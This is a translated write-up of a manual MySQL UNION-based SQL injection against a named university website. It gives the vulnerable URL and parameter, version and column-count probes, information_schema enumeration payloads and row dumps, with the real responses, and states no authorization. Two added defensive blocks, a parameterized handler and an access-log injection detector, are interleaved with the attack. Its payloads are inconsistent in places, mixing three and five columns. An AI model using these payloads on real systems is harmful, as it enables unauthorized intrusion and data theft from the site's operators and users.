Notes on a manual MySQL injection case

A record of manually injecting a MySQL-backed site at my school

Information gathering

How it was found

Subdomain scan -> import into AWVS -> batch scan for blind injection

URL

http://home.bjtu.edu.cn/

Info (whatweb)

  • 202.112.147.124 (school internal network)
  • Apache/2.4.9
  • Win64
  • PHP/5.5.12

Parameter

http://home.bjtu.edu.cn/ctrl/vote/ajax_vote_response.php?req=3&tid=1
- tid (GET)

Testing

Confirming the injection => tid

Appending a semicolon throws an error, and the error is echoed back:
You have an error in your SQL syntax;
check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 6

Determining the version: > 4.0

and ord(mid(version(),1,1))>51
Returns normally, so the version is > 4.0 and UNION is supported.

Finding the column count => 5

ORDER BY plus binary search

  • tid=1 and order by 6 => Unknown column '6' in 'order clause'
  • tid=1 and order by 5 => [{"item_title":"3","item_id":"3","item_count":36},{"item_title":"4","item_id":"4","item_count":22},{"item_title":"5","item_id":"5","item_count":66},{"item_title":"\u5b66\u4e60\u8bdd\u98981-\u89c2\u70b92","item_id":"2","item_count":84},{"item_title":"\u5b66\u4e60\u8bdd\u98981-\u89c2\u70b9\u4e00","item_id":"1","item_count":103}]

UNION + SELECT

tid=1 and 1=2 union select 1,2,3,4,5...,n
- Error output:
The used SELECT statements have a different number of columns
- Correct output:
[{"item_title":"2","item_id":"1","item_count":4}]
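The three behaviours this section relies on (an integer parameter pasted straight into SQL text, the driver's error message echoed to the client, and UNION rows rendered exactly like real vote items) all trace back to one query-building mistake. The following is an added example and not the site's code: a stand-in endpoint in Python over an in-memory sqlite3 database (assumed in place of MySQL; the table names, column names and sample rows are constructed to match the write-up), showing the concatenating handler beside a hardened one that validates the parameter's type, binds it, and returns only a generic error.

```python
import re
import sqlite3


def build_demo_db():
    """Constructed in-memory stand-in for the vote tables (sqlite3 assumed instead of MySQL)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE fsa_vote_item (item_title TEXT, item_id TEXT, item_count INTEGER, tid INTEGER)"
    )
    conn.executemany(
        "INSERT INTO fsa_vote_item VALUES (?, ?, ?, ?)",
        [("3", "3", 36, 1), ("4", "4", 22, 1), ("5", "5", 66, 1), ("other", "9", 1, 2)],
    )
    conn.execute(
        "CREATE TABLE fsa_vote_topic (topic_id INTEGER, topic_title TEXT, topic_type_id INTEGER)"
    )
    conn.executemany(
        "INSERT INTO fsa_vote_topic VALUES (?, ?, ?)",
        [(1, "topic one", 1), (2, "topic two", 1)],
    )
    return conn


def vote_items_vulnerable(conn, tid):
    """Builds the query by string concatenation, so the raw GET value becomes SQL text,
    and echoes the driver's error message: the two defects the write-up relies on."""
    sql = "SELECT item_title, item_id, item_count FROM fsa_vote_item WHERE tid=" + str(tid)
    try:
        return {"ok": True, "rows": conn.execute(sql).fetchall()}
    except sqlite3.Error as exc:
        return {"ok": False, "error": str(exc)}


def vote_items_hardened(conn, tid):
    """Rejects anything but a short digit string, binds the value as a parameter,
    and never reveals database error text to the client."""
    if not re.fullmatch(r"[0-9]{1,9}", str(tid)):
        return {"ok": False, "error": "invalid request"}
    try:
        rows = conn.execute(
            "SELECT item_title, item_id, item_count FROM fsa_vote_item WHERE tid=?",
            (int(tid),),
        ).fetchall()
        return {"ok": True, "rows": rows}
    except sqlite3.Error:
        # Log the exception server-side in a real handler; the client only sees a generic message.
        return {"ok": False, "error": "invalid request"}


if __name__ == "__main__":
    db = build_demo_db()
    probe = "1 and 1=2 union select topic_title,-1,-1 from fsa_vote_topic"
    print("vulnerable:", vote_items_vulnerable(db, probe))
    print("hardened:  ", vote_items_hardened(db, probe))
```

The type check alone would have stopped every request in this write-up, but it is the bound parameter that makes the fix hold for string parameters too; the generic error message is what removes the syntax-error oracle used in the first step.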

Information gathering

and 1=2 union select [function],-1,-1,-1,-1
- version(): database version => 5.6.17
- database(): currently connected database => stu
- @@version_compile_os: operating system => Win64
- @@datadir: database data directory => c:\wamp\bin\mysql\mysql5.6.17\data\
- @@basedir: MySQL installation path

Retrieving all database names

Input

select * from stu where tid=1 and 1=2 union select SCHEMA_NAME,-1,-1,-1,-1 from information_schema.columns;

Or:
select * from stu where tid=1 and 1=2 union select table_schema,-1,-1,-1,-1 from information_schema.columns;

Output

[{"item_title":"-1","item_id":"information_schema","item_count":-1},
{"item_title":"-1","item_id":"mysql","item_count":-1},
{"item_title":"-1","item_id":"performance_schema","item_count":-1},
{"item_title":"-1","item_id":"stu","item_count":-1},
{"item_title":"-1","item_id":"student","item_count":-1}]

Retrieving the table names in stu

Input (including output-format handling)

select * from stu where tid=1 and 1=2 union select concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-1,-1 from information_schema.columns where table_schema="stu";

Output

[{"item_title":"-1","item_id":"[xxoo] fsa_about, fsa_contest_and_project, fsa_css3_example, fsa_nav_feedback, fsa_nav_feedback_type, fsa_nav_list, fsa_nav_page_list, fsa_nav_page_list_1, fsa_nav_page_list_395, fsa_nav_page_list_396, fsa_nav_page_list_398, fsa_nav_page_list_399, fsa_nav_page_list_400, fsa_nav_page_list_401, fsa_nav_page_list_402, fsa_nav_page_list_403, fsa_nav_page_list_404, fsa_nav_ ... [xxoo]","item_count":-1}]

Retrieving the column names in fsa_vote_topic

Input

and 1=2 union select concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT column_name),0x5B78786F6F5D),-1,-1,-1,-1 from information_schema.columns where table_name='fsa_vote_topic'

Output

[{"item_title":"-1","item_id":"[xxoo] topic_id, topic_title, topic_type_id [xxoo]","item_count":-1}]

Determining the field count

Input

and 1=2 union select concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-1,-1,-1,-1 from fsa_vote_topic

Output

[{"item_title":"-1","item_id":"[xxoo] 12 [xxoo]","item_count":-1}]

Retrieving field values

Input

Stepping the LIMIT value one at a time dumps the contents entry by entry

and 1=0 union select concat(0x5B78786F6F5D,topic_title,0x5B78786F6F5D),-1,-1,-1,-1 from fsa_vote_topic LIMIT 0,1

Output

[{"item_title":"-1","item_id":"[xxoo] \u5b66\u4e60\u8bdd\u98981 [xxoo]","item_count":-1}]

Decoded => 学习话题1
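From a defender's side, every step from the version probe through the information_schema enumeration and the row-by-row LIMIT dumps leaves a distinctive trace in the web server's access log, even though each response came back HTTP 200. The following is an added example and not part of the original post: a Python scanner over constructed Apache combined-format log lines (the IPs, timestamps and sizes are made up; the request paths mirror the probes above) that flags the pattern each step used on a per-parameter basis and counts flagged requests per source.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Apache combined-format access log line (the fingerprinted server above is Apache).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+'
)

# One signature per probe style seen in the write-up, applied to each decoded parameter value.
SIGNATURES = [
    ("version-probe", re.compile(r"\bord\s*\(\s*mid\s*\(\s*version\s*\(", re.I)),
    ("column-count-probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union-select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("schema-enumeration", re.compile(r"\binformation_schema\b", re.I)),
    ("server-variable", re.compile(r"@@(version_compile_os|version|datadir|basedir)\b", re.I)),
    ("hex-literal", re.compile(r"\b0x[0-9a-f]{4,}", re.I)),
    ("row-walk", re.compile(r"\blimit\s+\d+\s*,\s*\d+", re.I)),
]

# Parameters this endpoint only ever expects as integers (assumed from the URL above).
NUMERIC_PARAMS = {"req", "tid"}


def analyze_request(line):
    """Returns a finding record for one log line, or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    findings = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        # parse_qsl has already percent-decoded the value.
        for label, pattern in SIGNATURES:
            if pattern.search(value):
                findings.append(f"{name}:{label}")
        if name in NUMERIC_PARAMS and not re.fullmatch(r"[0-9]+", value):
            findings.append(f"{name}:non-numeric")
    return {"ip": m.group("ip"), "path": parts.path, "status": m.group("status"), "findings": findings}


def scan_log(text):
    """All parsed requests that triggered at least one finding, in log order."""
    results = []
    for line in text.splitlines():
        record = analyze_request(line) if line.strip() else None
        if record and record["findings"]:
            results.append(record)
    return results


def suspicious_sources(text, threshold=3):
    """Source IPs with at least `threshold` flagged requests: one client walking
    the injection step by step stands out even when every response is HTTP 200."""
    counts = Counter(r["ip"] for r in scan_log(text))
    return {ip: n for ip, n in counts.items() if n >= threshold}


# Constructed sample log: a normal request, then the probes in the order the write-up used them.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2016:10:00:01 +0800] "GET /ctrl/vote/ajax_vote_response.php?req=3&tid=1 HTTP/1.1" 200 311
10.0.0.5 - - [01/Jan/2016:10:00:02 +0800] "GET /ctrl/vote/ajax_vote_response.php?req=3&tid=1%27 HTTP/1.1" 200 142
10.0.0.5 - - [01/Jan/2016:10:00:03 +0800] "GET /ctrl/vote/ajax_vote_response.php?req=3&tid=1%20and%20ord(mid(version(),1,1))%3E51 HTTP/1.1" 200 311
10.0.0.5 - - [01/Jan/2016:10:00:04 +0800] "GET /ctrl/vote/ajax_vote_response.php?req=3&tid=1%20and%20order%20by%206 HTTP/1.1" 200 97
10.0.0.5 - - [01/Jan/2016:10:00:05 +0800] "GET /ctrl/vote/ajax_vote_response.php?req=3&tid=1%20and%201=2%20union%20select%20@@datadir,-1,-1,-1,-1 HTTP/1.1" 200 120
10.0.0.5 - - [01/Jan/2016:10:00:06 +0800] "GET /ctrl/vote/ajax_vote_response.php?req=3&tid=1%20and%201=2%20union%20select%20concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT%20table_name),0x5B78786F6F5D),-1,-1,-1,-1%20from%20information_schema.columns%20where%20table_schema=%22stu%22 HTTP/1.1" 200 900
10.0.0.5 - - [01/Jan/2016:10:00:07 +0800] "GET /ctrl/vote/ajax_vote_response.php?req=3&tid=1%20and%201=0%20union%20select%20topic_title,-1,-1,-1,-1%20from%20fsa_vote_topic%20LIMIT%200,1 HTTP/1.1" 200 130
10.0.0.9 - - [01/Jan/2016:10:01:00 +0800] "GET /index.php?page=2 HTTP/1.1" 200 5120
"""

if __name__ == "__main__":
    for record in scan_log(SAMPLE_LOG):
        print(record["ip"], record["path"], record["findings"])
    print(suspicious_sources(SAMPLE_LOG))
```

The per-parameter type check (`tid:non-numeric`) fires on the very first malformed request, before any keyword signature matches, which is why it is worth knowing which query parameters an endpoint treats as integers; the keyword signatures then tell you how far the enumeration got.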

Note

When writing the payload, be careful: arguments inside functions are not quoted, whereas values assigned with an equals sign must be quoted.

Unquoted case (topic_title) (fsa_vote_topic):
concat(0x5B78786F6F5D,topic_title,0x5B78786F6F5D)
from fsa_vote_topic LIMIT 0,1

Quoted case (assignment with an equals sign):
here table_name='fsa_vote_topic'
